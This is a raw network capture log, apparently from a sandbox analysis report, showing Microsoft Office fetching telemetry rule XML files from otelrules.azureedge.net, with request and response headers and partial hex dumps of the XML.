                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  91192.168.2.44988313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:38 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1952
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                  x-ms-request-id: efe1277d-c01e-008d-7f4b-3c2eec000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134738Z-15b8b599d889gj5whC1TEBfyk000000002wg000000004w3g
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:38 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  92192.168.2.44988413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:38 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 958
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                  x-ms-request-id: ccd0b474-201e-0096-421e-3dace6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134738Z-178bfbc474brk967hC1NYCfu60000000048000000000dzb0
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:38 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  93192.168.2.44988513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:38 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 501
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                  ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                  x-ms-request-id: b5a95b30-c01e-002b-0632-3c6e00000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134738Z-178bfbc474bh5zbqhC1NYCkdug00000004cg00000000fa46
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:38 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  94192.168.2.44988613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:38 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2592
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                  x-ms-request-id: bc0c8c97-701e-0053-1e45-3c3a0a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134738Z-178bfbc474bv587zhC1NYCny5w00000004f0000000005ynb
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:38 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  95192.168.2.44988713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:38 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 3342
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                  ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                  x-ms-request-id: abaf503b-901e-0064-2b47-3ce8a6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134738Z-15b8b599d885v8r9hC1TEB104g000000035g000000000q4n
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:39 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  96192.168.2.44988813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:40 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:40 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:40 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2284
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                  ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                  x-ms-request-id: 1a818a33-b01e-005c-4475-3b4c66000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134740Z-174c587ffdfp4vpjhC1TEBybqw000000033g000000001by8
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:40 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  97192.168.2.44988913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:40 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:40 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1393
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                  x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134740Z-178bfbc474bv7whqhC1NYC1fg400000004kg000000006c26
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:41 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  98192.168.2.44989013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:40 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:40 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1356
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                  x-ms-request-id: 42455f54-301e-0051-494c-3c38bb000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134740Z-15b8b599d88qw29phC1TEB5zag00000002y000000000dhpa
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:41 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  99192.168.2.44989113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:40 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:40 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1393
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                  x-ms-request-id: c6f64b36-301e-0000-4706-3deecc000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134740Z-178bfbc474bwh9gmhC1NYCy3rs00000004kg00000000c8s9
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:41 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  100192.168.2.44989213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:40 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:41 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1356
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                  x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134741Z-178bfbc474bv7whqhC1NYC1fg400000004fg00000000d6mh
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
